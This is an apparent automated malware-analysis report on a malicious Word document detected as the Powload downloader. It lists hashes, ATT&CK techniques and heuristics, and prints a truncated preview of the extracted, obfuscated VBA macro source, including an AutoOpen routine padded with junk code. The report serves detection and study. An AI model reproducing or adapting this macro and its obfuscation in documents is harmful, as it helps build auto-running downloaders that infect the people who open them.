Office (OLE) malware analysis — malicious · afc2ac4f3fc0cd37

MALICIOUS

Office (OLE)

157.1 KB Created: 2019-05-02 11:37:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: f6c6821410c123c0adbf217703bf0802 SHA-1: a8dbdc85151f1ace9f21a2a5032993170a06399c SHA-256: afc2ac4f3fc0cd3719696f2428c5c615b8bc418b4e7e497ed38babb64b0ed6fc

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro. Critical heuristics indicate the use of WMI to launch processes, suggesting the macro's purpose is to download and execute a second-stage payload. The ClamAV signature 'Doc.Downloader.Powload-6960273-0' further supports this downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6960273-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6960273-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32065 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32065 bytes
SHA-256: `f73112027860fe5fca28930e5d203244cff8e2656af8328846776d2dd90446f5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "B9709010" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "q00_802" Attribute VB_Base = "0{77182310-740A-414E-80EE-E83D27A71280}{F5F0B46C-E5EA-4447-9D4F-E2AC4EECBBC4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "O09395_9" Attribute VB_Name = "h_502254" Attribute VB_Name = "v7189_84" Attribute VB_Name = "r367582" Attribute VB_Base = "0{F87F796A-377C-44FA-9A96-7C793E31A635}{A2E0618C-EBE0-41BA-B1C2-7B5A8C6BB60D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "h3344615" Function E73623_(I96323) Select Case k68407 Case d6320145 = s66970 = Sgn(102729877) Case L7404851 = K5363717 Case z50_3549 = Log(q3586337) Case Z_25907 = CBool(45233673) Case b49800 = 736218445 Case u48222_ = CDate(A145803) End Select Select Case M_8__7 Case A7520093 = j1612897 = Sgn(511370031) Case M1_538 = C25508 Case U36911 = Log(X729_3) Case A89669 = CBool(645030910) Case H8848752 = 436938566 Case z62290 = CDate(b320945) End Select Select Case H335684 Case P_830_39 = I8548474 = Sgn(662961206) Case o_22951 = W8975891 Case S779788 = Log(D_47946) Case B172116 = CBool(447794048) Case s_766430 = 164756141 Case a166892 = CDate(N_7319) End Select Set E73623_ = CVar(I96323) Select Case E21629 Case m642331 = I691833 = Sgn(155114654) Case S30230 = r6047681 Case N3722826 = Log(T00487) Case w51304 = CBool(231084096) Case t0347_6 = 901373701 Case N22_962 = CDate(j6810720) End Select Select Case o9323213 Case F917896 = z27595 = Sgn(605210303) Case r8524081 = k141_19 Case d913__3 = Log(R69702) Case D_53_8 = CBool(761839810) Case J8175_6_ = 639514882 Case W522_586 = CDate(H389_9) End Select Select Case d87911 Case w4_67501 = r3640461 = Sgn(944130080) Case M1758570 = b2557105 Case X28738 = Log(L4123_93) Case v_4289 = CBool(305932791) Case w44771 = 470830078 Case W_3_39 = CDate(t5_5849) End Select End Function Sub autoopen() Select Case k405191 Case r6_35_2 = c03_677_ = Sgn(916534472) Case H15_154 = B89930 Case z625911 = Log(o04920) Case N01_2_ = CBool(625810851) Case m015878 = 269680093 Case C05_590 = CDate(S6_9_7_) End Select Select Case N50761_ Case p07_634 = U73805 = Sgn(849910045) Case F6747988 = V13812 Case U9_91300 = Log(c65854) Case o649491 = CBool(230841503) Case J_2657 = 453655854 Case Q5569442 = CDate(k70965_) End Select Select Case Y53__44 Case d_559_68 = h078043 = Sgn(862515626) Case F7_843 = p_96721 Case C83_48 = Log(j085786) Case q__8179 = CBool(82421662) Case k23571 = 327555382 Case m39043 = CDate(a133333) End Select Call Y_43773 Select Case r720820 Case E965044 = f3_23__ = Sgn(225592149) Case c8_5860 = n2348996 Case l6206938 = Log(I05751) Case Q0__88 = CBool(942660283) Case s446555 = 758486682 Case o685923 = CDate(i8_71838) End Select Select Case N5069682 Case q602924 = j12581_ = Sgn(367343208) Case h8601_ = s6698336 Case V219181_ = Log(I5920_60) Case q24251_ = CBool(880933770) Case I3_1_820 = 652576007 Case G969685_ = CDate(S3613904) End Select Select Case F423080 Case s6655563 = G499837 = Sgn(24500381) Case S7463095 = X32750 Case t5_6930 = Log(Z6_3865) Case K_3682 = CBool(282812111) Case s3259332 = 895176855 Case r17_74__ = CDate(n9228_34) End Select End Sub Attribute VB_Name = "f40_59" Function Y_43773() On Error Resume Next Select Case d51302 Case Z3280838 = u02__663 = Sgn(675843114) Case C0651748 = u062_1 Case T954858 = Log(Z78859_) Case l491__4 = CBool(753268533) Case j9_ ... (truncated)

SHA-256: f73112027860fe5fca28930e5d203244cff8e2656af8328846776d2dd90446f5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "B9709010"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "q00_802"
Attribute VB_Base = "0{77182310-740A-414E-80EE-E83D27A71280}{F5F0B46C-E5EA-4447-9D4F-E2AC4EECBBC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "O09395_9"

Attribute VB_Name = "h_502254"

Attribute VB_Name = "v7189_84"

Attribute VB_Name = "r367582"
Attribute VB_Base = "0{F87F796A-377C-44FA-9A96-7C793E31A635}{A2E0618C-EBE0-41BA-B1C2-7B5A8C6BB60D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "h3344615"
Function E73623_(I96323)
   Select Case k68407
Case d6320145 = s66970 = Sgn(102729877)
Case L7404851 = K5363717
Case z50_3549 = Log(q3586337)
Case Z_25907 = CBool(45233673)
Case b49800 = 736218445
Case u48222_ = CDate(A145803)
End Select
   Select Case M_8__7
Case A7520093 = j1612897 = Sgn(511370031)
Case M1_538 = C25508
Case U36911 = Log(X729_3)
Case A89669 = CBool(645030910)
Case H8848752 = 436938566
Case z62290 = CDate(b320945)
End Select
   Select Case H335684
Case P_830_39 = I8548474 = Sgn(662961206)
Case o_22951 = W8975891
Case S779788 = Log(D_47946)
Case B172116 = CBool(447794048)
Case s_766430 = 164756141
Case a166892 = CDate(N_7319)
End Select
Set E73623_ = CVar(I96323)
   Select Case E21629
Case m642331 = I691833 = Sgn(155114654)
Case S30230 = r6047681
Case N3722826 = Log(T00487)
Case w51304 = CBool(231084096)
Case t0347_6 = 901373701
Case N22_962 = CDate(j6810720)
End Select
   Select Case o9323213
Case F917896 = z27595 = Sgn(605210303)
Case r8524081 = k141_19
Case d913__3 = Log(R69702)
Case D_53_8 = CBool(761839810)
Case J8175_6_ = 639514882
Case W522_586 = CDate(H389_9)
End Select
   Select Case d87911
Case w4_67501 = r3640461 = Sgn(944130080)
Case M1758570 = b2557105
Case X28738 = Log(L4123_93)
Case v_4289 = CBool(305932791)
Case w44771 = 470830078
Case W_3_39 = CDate(t5_5849)
End Select
End Function
Sub autoopen()
   Select Case k405191
Case r6_35_2 = c03_677_ = Sgn(916534472)
Case H15_154 = B89930
Case z625911 = Log(o04920)
Case N01_2_ = CBool(625810851)
Case m015878 = 269680093
Case C05_590 = CDate(S6_9_7_)
End Select
   Select Case N50761_
Case p07_634 = U73805 = Sgn(849910045)
Case F6747988 = V13812
Case U9_91300 = Log(c65854)
Case o649491 = CBool(230841503)
Case J_2657 = 453655854
Case Q5569442 = CDate(k70965_)
End Select
   Select Case Y53__44
Case d_559_68 = h078043 = Sgn(862515626)
Case F7_843 = p_96721
Case C83_48 = Log(j085786)
Case q__8179 = CBool(82421662)
Case k23571 = 327555382
Case m39043 = CDate(a133333)
End Select
Call Y_43773
   Select Case r720820
Case E965044 = f3_23__ = Sgn(225592149)
Case c8_5860 = n2348996
Case l6206938 = Log(I05751)
Case Q0__88 = CBool(942660283)
Case s446555 = 758486682
Case o685923 = CDate(i8_71838)
End Select
   Select Case N5069682
Case q602924 = j12581_ = Sgn(367343208)
Case h8601_ = s6698336
Case V219181_ = Log(I5920_60)
Case q24251_ = CBool(880933770)
Case I3_1_820 = 652576007
Case G969685_ = CDate(S3613904)
End Select
   Select Case F423080
Case s6655563 = G499837 = Sgn(24500381)
Case S7463095 = X32750
Case t5_6930 = Log(Z6_3865)
Case K_3682 = CBool(282812111)
Case s3259332 = 895176855
Case r17_74__ = CDate(n9228_34)
End Select
End Sub

Attribute VB_Name = "f40_59"
Function Y_43773()
On Error Resume Next
   Select Case d51302
Case Z3280838 = u02__663 = Sgn(675843114)
Case C0651748 = u062_1
Case T954858 = Log(Z78859_)
Case l491__4 = CBool(753268533)
Case j9_
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.